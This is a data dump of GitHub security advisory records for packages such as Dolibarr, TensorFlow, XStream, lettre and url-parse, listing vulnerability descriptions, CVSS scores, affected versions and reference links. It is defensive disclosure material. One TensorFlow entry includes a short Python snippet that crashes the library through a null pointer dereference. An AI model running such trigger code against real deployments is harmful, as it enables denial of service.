'url': 'https://github.com/shawnscode/crayon'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0037.html'}]","{'cwe_ids': ['CWE-367'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T20:56:31Z', 'nvd_published_at': None}" +1.4.0,GHSA-vxhc-c4qm-647p,2021-10-21T13:35:03Z,2021-08-11T15:18:11Z,,['CVE-2021-25954'],Improper Access Control in Dolibarr,"In “Dolibarr” application, 2.8.1 to 13.0.4 don’t restrict or incorrectly restricts access to a resource from an unauthorized actor. A low privileged attacker can modify the Private Note which only an administrator has rights to do, the affected field is at “/adherents/note.php?id=1” endpoint.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'dolibarr/dolibarr'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.1'}, {'fixed': '14.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25954'}, {'type': 'WEB', 'url': 'https://github.com/Dolibarr/dolibarr/commit/8cc100012d46282799fb19f735a53b7101569377'}, {'type': 'PACKAGE', 'url': 'https://github.com/Dolibarr/dolibarr'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25954'}]","{'cwe_ids': ['CWE-284', 'CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-10T17:28:01Z', 'nvd_published_at': '2021-08-09T17:15:00Z'}" +1.4.0,GHSA-j52m-489x-v634,2023-06-13T17:45:35Z,2021-08-25T20:44:13Z,,['CVE-2019-16880'],Double free in linea,"Affected versions of this crate did not properly implements the Matrix::zip_elements method, which causes an double free when the given trait implementation might panic. This allows an attacker to corrupt or take control of the memory.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'linea'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.9.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-16880'}, {'type': 'WEB', 'url': 'https://github.com/strake/linea.rs/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/strake/linea.rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0021.html'}]","{'cwe_ids': ['CWE-415'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:23:06Z', 'nvd_published_at': None}" +1.4.0,GHSA-2wc6-2rcj-8v76,2023-06-13T20:56:05Z,2021-08-25T21:00:41Z,,['CVE-2017-1000168'],scalarmult() vulnerable to degenerate public keys,"The scalarmult() function included in previous versions of this crate accepted all-zero public keys, for which the resulting Diffie-Hellman shared secret will always be zero regardless of the private key used. + +This issue was fixed by checking for this class of keys and rejecting them if they are used.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'sodiumoxide'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.14'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-1000168'}, {'type': 'WEB', 'url': 'https://github.com/dnaq/sodiumoxide/issues/154'}, {'type': 'WEB', 'url': 'https://github.com/sodiumoxide/sodiumoxide/commit/24c7a5550807ac8a09648b5878f19d14c3a69135'}, {'type': 'PACKAGE', 'url': 'https://github.com/sodiumoxide/sodiumoxide'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2017-0001.html'}]","{'cwe_ids': ['CWE-1240'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-05T21:10:47Z', 'nvd_published_at': None}" +1.4.0,GHSA-f865-m6cq-j9vx,2021-10-08T20:45:06Z,2021-08-09T20:44:51Z,,['CVE-2021-29063'],ReDOS in Mpmath,A Regular Expression Denial of Service (ReDOS) vulnerability was discovered in Mpmath v1.0.0 when the mpmathify function is called.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'mpmath'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29063'}, {'type': 'WEB', 'url': 'https://github.com/fredrik-johansson/mpmath/issues/548'}, {'type': 'WEB', 'url': 'https://github.com/mpmath/mpmath/pull/570'}, {'type': 'WEB', 'url': 'https://github.com/npm/hosted-git-info/pull/76'}, {'type': 'WEB', 'url': 'https://github.com/fredrik-johansson/mpmath/commit/46d44c3c8f3244017fe1eb102d564eb4ab8ef750'}, {'type': 'WEB', 'url': 'https://github.com/fredrik-johansson/mpmath/commit/c811b37c65a4372a7ce613111d2a508c204f9833'}, {'type': 'WEB', 'url': 'https://github.com/mpmath/mpmath/commit/c811b37c65a4372a7ce613111d2a508c204f9833'}, {'type': 'PACKAGE', 'url': 'https://github.com/fredrik-johansson/mpmath'}, {'type': 'WEB', 'url': 'https://github.com/mpmath/mpmath/releases/tag/1.3.0'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/mpmath/PYSEC-2021-427.yaml'}, {'type': 'WEB', 'url': 'https://github.com/yetingli/PoCs/blob/main/CVE-2021-29063/Mpmath.md'}, {'type': 'WEB', 'url': 'https://github.com/yetingli/SaveResults/blob/main/js/hosted-git-info.js'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3M5O55E7VUDMXCPQR6MQTOIFDKHP36AA/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EIUX3XWY2K3MSO7QXMZXQQYAURARSPC5/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MS2U6GLXQSRZJE2HVUAUMVFR2DWQLCZG/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/hosted-git-info'}]","{'cwe_ids': ['CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-22T16:00:52Z', 'nvd_published_at': '2021-06-21T20:15:00Z'}" +1.4.0,GHSA-hh27-ffr2-f2jc,2021-08-10T16:06:59Z,2021-08-10T16:07:08Z,,['CVE-2021-3664'],Open redirect in url-parse,"# Overview + +Affected versions of npm `url-parse` are vulnerable to URL Redirection to Untrusted Site. + +# Impact + +Depending on library usage and attacker intent, impacts may include allow/block list bypasses, SSRF attacks, open redirects, or other undesired behavior.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'url-parse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3664'}, {'type': 'WEB', 'url': 'https://github.com/unshiftio/url-parse/issues/205'}, {'type': 'WEB', 'url': 'https://github.com/unshiftio/url-parse/issues/206'}, {'type': 'WEB', 'url': 'https://github.com/unshiftio/url-parse/commit/81ab967889b08112d3356e451bf03e6aa0cbb7e0'}, {'type': 'PACKAGE', 'url': 'https://github.com/unshiftio/url-parse'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/1625557993985-unshiftio/url-parse'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/02/msg00030.html'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-02T21:28:20Z', 'nvd_published_at': '2021-07-26T12:15:00Z'}" +1.4.0,GHSA-6wf9-jmg9-vxcc,2022-02-08T20:59:06Z,2021-08-25T14:48:39Z,,['CVE-2021-39140'],XStream can cause a Denial of Service,"### Impact +The vulnerability may allow a remote attacker to allocate 100% CPU time on the target system depending on CPU type or parallel execution of such a payload resulting in a denial of service only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. + +### Patches +XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose. + +### Workarounds +See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs. + +### References +See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-39140](https://x-stream.github.io/CVE-2021-39140.html). + +### Credits +The vulnerability was discovered and reported by Lai Han of nsfocus security team. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [XStream](https://github.com/x-stream/xstream/issues) +* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.18'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/security/advisories/GHSA-6wf9-jmg9-vxcc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39140'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/09/msg00017.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210923-0003/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5004'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2021-39140.html'}]","{'cwe_ids': ['CWE-502', 'CWE-835'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T18:22:01Z', 'nvd_published_at': '2021-08-23T19:15:00Z'}" +1.4.0,GHSA-xp5q-77mh-6hm2,2021-08-24T20:02:07Z,2021-08-25T14:50:17Z,,['CVE-2021-3728'],firefly-iii is vulnerable to Cross-Site Request Forgery (CSRF),firefly-iii is vulnerable to Cross-Site Request Forgery (CSRF),"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'grumpydictator/firefly-iii'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.6.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3728'}, {'type': 'WEB', 'url': 'https://github.com/firefly-iii/firefly-iii/commit/14cdce113e0eb8090d09066fcd2b5cf03b5ac84e'}, {'type': 'PACKAGE', 'url': 'https://github.com/firefly-iii/firefly-iii/'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/dd54c5a1-0d4a-4f02-a111-7ce4ddc67a4d'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T20:02:07Z', 'nvd_published_at': '2021-08-23T13:15:00Z'}" +1.4.0,GHSA-mmc9-pwm7-qj5w,2021-08-18T20:45:24Z,2021-08-25T20:56:50Z,,['CVE-2020-25576'],Unaligned memory access in rand_core,"### Impact +Affected versions of this crate violated alignment when casting byte slices to integer slices, resulting in undefined behavior. `rand_core::BlockRng::next_u64` and `rand_core::BlockRng::fill_bytes` are affected. + +### Patches +The flaw was corrected by Ralf Jung and Diggory Hardy for `rand_core >= 0.4.2`. + +### Workarounds +None. + +### References +See [Rand's changelog](https://github.com/rust-random/rand/blob/master/rand_core/CHANGELOG.md#050---2019-06-06). + +### For more information +If you have any questions or comments about this advisory, [open an issue in the Rand repository](https://github.com/rust-random/rand/issues/new/choose). + +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'rand_core'}, 'ecosystem_specific': {'affected_functions': ['rand_core::BlockRng::fill_bytes', 'rand_core::BlockRng::next_u64']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.4.0'}, {'fixed': '0.4.2'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'rand_core'}, 'ecosystem_specific': {'affected_functions': ['rand_core::BlockRng::fill_bytes', 'rand_core::BlockRng::next_u64']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/rust-random/rand/security/advisories/GHSA-mmc9-pwm7-qj5w'}, {'type': 'PACKAGE', 'url': 'https://github.com/rust-random/rand'}, {'type': 'WEB', 'url': 'https://github.com/rust-random/rand/blob/master/rand_core/CHANGELOG.md#050---2019-06-06'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0035.html'}]","{'cwe_ids': ['CWE-704'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T20:45:24Z', 'nvd_published_at': None}" +1.4.0,GHSA-pq6v-x7gp-7776,2021-08-19T21:25:09Z,2021-08-25T20:43:09Z,,['CVE-2016-10933'],Source code is downloaded over cleartext HTTP in portaudio,An issue was discovered in the portaudio crate through 0.7.0 for Rust. There is a man-in-the-middle issue because the source code is downloaded over cleartext HTTP.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'portaudio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.7.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-10933'}, {'type': 'WEB', 'url': 'https://github.com/RustAudio/rust-portaudio/issues/144'}, {'type': 'PACKAGE', 'url': 'https://github.com/RustAudio/rust-portaudio'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2016-0003.html'}]","{'cwe_ids': ['CWE-319'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:25:09Z', 'nvd_published_at': '2019-08-26T13:15:00Z'}" +1.4.0,GHSA-xr7r-88qv-q7hm,2023-06-13T21:04:01Z,2021-08-25T20:45:51Z,,['CVE-2019-25001'],Out of bounds write in serde_cbor,Affected versions of this crate did not properly check if semantic tags were nested excessively during deserialization. This allows an attacker to craft small (< 1 kB) CBOR documents that cause a stack overflow. The flaw was corrected by limiting the allowed number of nested tags.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'serde_cbor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.10.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-25001'}, {'type': 'WEB', 'url': 'https://github.com/pyfisch/cbor/pull/153'}, {'type': 'WEB', 'url': 'https://github.com/pyfisch/cbor/commit/1aec4f9d71855dbfb223fa61ca60260400cc5d5f'}, {'type': 'PACKAGE', 'url': 'https://github.com/pyfisch/cbor'}, {'type': 'WEB', 'url': 'https://github.com/pyfisch/cbor/releases/tag/v0.10.2'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0025.html'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:20:43Z', 'nvd_published_at': None}" +1.4.0,GHSA-qgm6-9472-pwq7,2022-02-08T21:34:31Z,2021-08-25T20:52:19Z,,['CVE-2021-23840'],Integer Overflow in openssl-src,"Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument in some cases where the input length is close to the maximum permissable length for an integer on the platform. In such cases the return value from the function call will be 1 (indicating success), but the output length value will be negative. This could cause applications to behave incorrectly or crash. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'openssl-src'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '111.14.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23840'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf'}, {'type': 'WEB', 'url': 'https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1'}, {'type': 'WEB', 'url': 'https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2'}, {'type': 'PACKAGE', 'url': 'https://github.com/alexcrichton/openssl-src-rs'}, {'type': 'WEB', 'url': 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846'}, {'type': 'WEB', 'url': 'https://kc.mcafee.com/corporate/index?page=content&id=SB10366'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0057.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202103-03'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210219-0009/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4855'}, {'type': 'WEB', 'url': 'https://www.openssl.org/news/secadv/20210216.txt'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/tns-2021-03'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/tns-2021-09'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/tns-2021-10'}]","{'cwe_ids': ['CWE-190'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:35:16Z', 'nvd_published_at': '2021-02-16T17:15:00Z'}" +1.4.0,GHSA-6gv8-p3vj-pxvr,2021-08-23T21:14:27Z,2021-08-25T14:43:27Z,,['CVE-2021-37649'],Null pointer dereference in `UncompressElement`,"### Impact +The code for `tf.raw_ops.UncompressElement` can be made to trigger a null pointer dereference: + +```python +import tensorflow as tf + +data = tf.data.Dataset.from_tensors([0.0]) +tf.raw_ops.UncompressElement( + compressed=tf.data.experimental.to_variant(data), + output_types=[tf.int64], + output_shapes=[2]) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/f24faa153ad31a4b51578f8181d3aaab77a1ddeb/tensorflow/core/kernels/data/experimental/compression_ops.cc#L50-L53) obtains a pointer to a `CompressedElement` from a `Variant` tensor and then proceeds to dereference it for decompressing. There is no check that the `Variant` tensor contained a `CompressedElement`, so the pointer is actually `nullptr`. + +### Patches +We have patched the issue in GitHub commit [7bdf50bb4f5c54a4997c379092888546c97c3ebd](https://github.com/tensorflow/tensorflow/commit/7bdf50bb4f5c54a4997c379092888546c97c3ebd). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-6gv8-p3vj-pxvr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37649'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/7bdf50bb4f5c54a4997c379092888546c97c3ebd'}]","{'cwe_ids': ['CWE-476'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T21:14:27Z', 'nvd_published_at': '2021-08-12T19:15:00Z'}" +1.4.0,GHSA-96w3-p368-4h8c,2023-06-13T18:17:00Z,2021-08-25T20:46:51Z,,['CVE-2020-35874'],Use after free in internment,"ArcIntern::drop has a race condition where it can release memory which is about to get another user. The new user will get a reference to freed memory. + +This was fixed by serializing access to an interned object while it is being deallocated. + +Versions prior to 0.3.12 used stronger locking which avoided the problem.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'internment'}, 'ecosystem_specific': {'affected_functions': ['internment::ArcIntern::drop']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.3.12'}, {'fixed': '0.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35874'}, {'type': 'WEB', 'url': 'https://github.com/droundy/internment/issues/11'}, {'type': 'PACKAGE', 'url': 'https://github.com/droundy/internment'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0017.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:19:06Z', 'nvd_published_at': None}" +1.4.0,GHSA-vc2p-r46x-m3vx,2021-08-18T20:59:57Z,2021-08-25T20:56:48Z,,['CVE-2020-28247'],Argument injection in lettre,"### Impact + +Affected versions of lettre allowed argument injection to the sendmail command. It was possible, using forged to addresses, to pass arbitrary arguments to the sendmail executable. + +Depending on the implementation (original sendmail, postfix, exim, etc.) it could be possible in some cases to write email data into abritrary files (using sendmail's logging features). + +*NOTE*: This vulnerability only affects the sendmail transport. Others, including smtp, are not affected. + +### Fix + +The flaw is corrected by modifying the executed command to stop parsing arguments before passing the destination addresses. + +### References + +* [RUSTSEC-2020-0069](https://rustsec.org/advisories/RUSTSEC-2020-0069.html) +* [CVE-2020-28247](https://nvd.nist.gov/vuln/detail/CVE-2020-28247)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'lettre'}, 'ecosystem_specific': {'affected_functions': ['lettre::sendmail::SendmailTransport::send', 'lettre::transport::sendmail::SendmailTransport::send', 'lettre::transport::sendmail::SendmailTransport::send_raw']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.9.0'}, {'fixed': '0.9.5'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'lettre'}, 'ecosystem_specific': {'affected_functions': ['lettre::sendmail::SendmailTransport::send', 'lettre::transport::sendmail::SendmailTransport::send', 'lettre::transport::sendmail::SendmailTransport::send_raw']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.8.0'}, {'fixed': '0.8.4'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'lettre'}, 'ecosystem_specific': {'affected_functions': ['lettre::sendmail::SendmailTransport::send', 'lettre::transport::sendmail::SendmailTransport::send', 'lettre::transport::sendmail::SendmailTransport::send_raw']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.7.0'}, {'fixed': '0.7.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/lettre/lettre/security/advisories/GHSA-vc2p-r46x-m3vx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28247'}, {'type': 'WEB', 'url': 'https://github.com/RustSec/advisory-db/pull/478/files'}, {'type': 'WEB', 'url': 'https://github.com/lettre/lettre/pull/508/commits/bbe7cc5381c5380b54fb8bbb4f77a3725917ff0b'}, {'type': 'PACKAGE', 'url': 'https://github.com/lettre/lettre'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0069.html'}]","{'cwe_ids': ['CWE-77'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T20:59:57Z', 'nvd_published_at': None}" +1.4.0,GHSA-r6ff-2q3c-v3pv,2021-08-09T17:13:06Z,2021-08-25T21:00:01Z,,[],Compiler optimisation leads to SEGFAULT,"Affected versions of the `pnet` crate were optimized out by compiler, which caused dereference of uninitialized file descriptor which caused segfault.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'pnet'}, 'ecosystem_specific': {'affected_functions': ['pnet::transport::IcmpTransportChannelIterator']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.27.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/libpnet/libpnet/issues/449'}, {'type': 'WEB', 'url': 'https://github.com/libpnet/libpnet/pull/455'}, {'type': 'PACKAGE', 'url': 'https://github.com/libpnet/libpnet'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0037.html'}]","{'cwe_ids': ['CWE-908'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-09T17:13:06Z', 'nvd_published_at': None}" 